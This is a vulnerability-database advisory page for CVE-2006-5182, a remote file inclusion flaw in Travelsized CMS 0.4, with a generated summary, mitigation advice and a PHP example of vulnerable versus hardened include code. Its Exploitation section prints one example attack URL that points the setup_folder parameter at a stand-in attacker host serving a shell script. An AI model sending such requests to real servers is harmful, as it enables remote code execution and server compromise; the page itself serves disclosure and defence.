VYPR
Unrated severity · NVD Advisory · Published Oct 10, 2006 · Updated Apr 23, 2026

CVE-2006-5182

Description

Travelsized CMS 0.4 and earlier allows remote file inclusion via the setup_folder parameter in frontpage.php, leading to arbitrary code execution.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

Travelsized CMS versions 0.4 and earlier are vulnerable to a PHP remote file inclusion (RFI) flaw in frontpage.php. The script unsafely uses the setup_folder parameter from user input, allowing an attacker to supply a URL to a remote file containing malicious PHP code, which the server then includes and executes. No authentication is required to reach this code path, and the default configuration does not mitigate the dangerous parameter handling [1], [2].

Exploitation

An attacker can exploit this vulnerability by sending an HTTP GET request to the vulnerable CMS installation with a crafted setup_folder parameter pointing to a remote PHP script hosted on an attacker-controlled server. For example: http://target.com/frontpage.php?setup_folder=http://evil.com/shell.txt?. The exploit is straightforward and requires only network access to the target; no authentication, user interaction, or special privileges are needed. A proof-of-concept exploit in Perl has been publicly released [2].

Impact

Successful exploitation allows an attacker to execute arbitrary PHP code on the target server with the privileges of the web server user. This can lead to complete compromise of the CMS, including unauthorized access, data theft, defacement, or further lateral movement within the hosting environment [1], [2].

Mitigation

No official patch or updated version has been released for Travelsized CMS. The software appears to be end-of-life and unmaintained. Users should immediately disable or remove any accessible instances of the CMS, or apply input validation hardening to block URL-sourced parameters in frontpage.php. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date [1], [2].
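The hardening the mitigation section asks for amounts to never letting a request parameter decide what gets included. As an added illustration (not code from Travelsized CMS, whose source is not available on this page), the snippet below shows the generic include-of-user-input pattern the advisory describes beside a hardened version: the `frontpage.php` and `setup_folder` names follow the advisory, while the `config.php` target, the `setups` directory and the allowlist entries are assumptions made for the example.

```php
<?php
// Added illustration of the remote file inclusion pattern described in the
// advisory and one way to harden it. This is NOT Travelsized CMS source code;
// the include target "config.php", the "setups" directory and the allowlist
// values are assumed for illustration.

// Vulnerable pattern (returns the path the unsafe code would hand to include()).
// A request parameter flows into the include path unchanged. With the PHP ini
// setting allow_url_include enabled, a value beginning with a URL scheme makes
// PHP fetch and execute remote code; even with it disabled, "../" sequences let
// the request select arbitrary local files.
function vulnerable_setup_include(array $get): string
{
    $setup_folder = $get['setup_folder'] ?? 'default';
    return $setup_folder . '/config.php';
}

// Hardened pattern:
//  1. accept only a short allowlist of plain folder names (no schemes, no slashes);
//  2. canonicalise the resulting path with realpath() and confirm it stays inside
//     the installation's setups directory before it is included.
const ALLOWED_SETUP_FOLDERS = ['default', 'blue', 'minimal']; // assumed values

function resolve_setup_include(string $setups_dir, ?string $requested): ?string
{
    $folder = $requested ?? 'default';

    // Plain identifier only, and it must be on the allowlist.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $folder)
        || !in_array($folder, ALLOWED_SETUP_FOLDERS, true)) {
        return null;
    }

    $base   = realpath($setups_dir);
    $target = realpath($setups_dir . DIRECTORY_SEPARATOR . $folder
                       . DIRECTORY_SEPARATOR . 'config.php');
    if ($base === false || $target === false) {
        return null; // directory or file does not exist
    }

    // The canonical target must sit below the canonical base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// How frontpage.php would use the hardened resolver:
$path = resolve_setup_include(__DIR__ . '/setups', $_GET['setup_folder'] ?? null);
if ($path === null) {
    http_response_code(400);
    exit('invalid setup_folder');
}
include $path;
```

The allowlist is what removes the vulnerability class; the `realpath()` containment check is defence in depth in case the list is later widened to accept free-form names. Independently of the application code, setting `allow_url_include=Off` in php.ini (its default in modern PHP releases) stops `include` from fetching URLs at all, which blocks the remote half of this flaw for every script on the host but still leaves local file inclusion to the application-level checks above.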

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • cpe:2.3:a:dan_jensen:travelsized_cms:*:*:*:*:*:*:*:* (range: <=0.4)
  • (no CPE) (range: <=0.4)

Patches

0

No patches discovered yet.

Vulnerability mechanics

No source-code context is available for this CVE — the mechanics section is only generated when we can read the actual fix diff. Without that, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.

References

5

News mentions

0

No linked articles in our index yet.